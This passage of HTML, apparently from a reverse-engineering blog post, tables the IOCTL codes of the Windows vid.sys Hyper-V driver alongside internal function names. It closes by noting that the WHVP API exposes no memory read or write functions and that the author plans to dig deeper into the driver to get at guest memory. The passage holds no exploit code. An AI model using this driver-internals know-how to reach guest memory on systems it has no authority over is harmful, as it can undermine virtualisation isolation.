</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetXsaveData</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x2210D0</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidHvStatsIoctlPageMapLocal</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidClientBufferInitialize, VidClientBufferShare</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x2210D4</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidHypercallDoorbellIoctlMap</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidClientBufferShare</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x2210DC</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidVpLookup, VidClientBufferShare</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x2210F0</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidMessageSlotMap</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidVpLookup</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x221134</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidCpuidResultRegister</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvRegisterInterceptResult</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x221174</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidPartitionIoctlSetup</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvCreatePartition</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x22117C</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetXsaveData</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x220003</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidPartitionIoctlPropertyGet</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetPartitionId, WinHvGetPartitionProperty</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x22122B</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VsmmVaGpaCoreGetGpaPageProperties</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VsmmVaGpaCorepGpnCompareFunctionByPage,</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VsmmNtSlatAccessFault</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x2210B7</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidVpIoctlStateGet</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetVpRegisters</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x221013</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvAssertVirtualInterrupt</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x22105F</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VsmmDoorbellRemoveEntry</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidHandleTableFreeEntry</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x2210AF</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Get partition id from Prtn object</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x2210EF</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidVpLookup</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidVpSuspend, VidMessageSlotHandle, VidVpRun</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x22116F</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidPartitionIoctlPropertySet</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x22117B</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidVpIoctlStateSet</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetVpRegisters</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x2211A3</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VsmmExoTranslateGuestVirtualAddress</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvTranslateVirtualAddress</span></div>
</td></tr>
</tbody></table>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It corresponds to a limited set of functions provided by the WHVP API SDK. If a forbidden request is called, error code C0000002h will be returned.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As you can see, the functions for reading and writing memory are not available through the WHVP API, so memory access using the official API isn’t possible. We need to go deeper into the vid.sys driver and consider the structure of the created memory blocks.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="268" src="https://lh6.googleusercontent.com/JWXnKSI3HPu9iQv9G4MWipJDcGvILgRf5oAPcQ2BBlc9hAJgjkyfJiiuuSBSI5cLKibEH1TFU8_AEctESRcbjjfn8Ct4ickVy3vdsj9NYG3zbprTtT-YSMUIdIlelGKG6FdWyJK8A-OrtMcxzw" style="margin-left: 0px; margin-top: 0px;" width="479" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
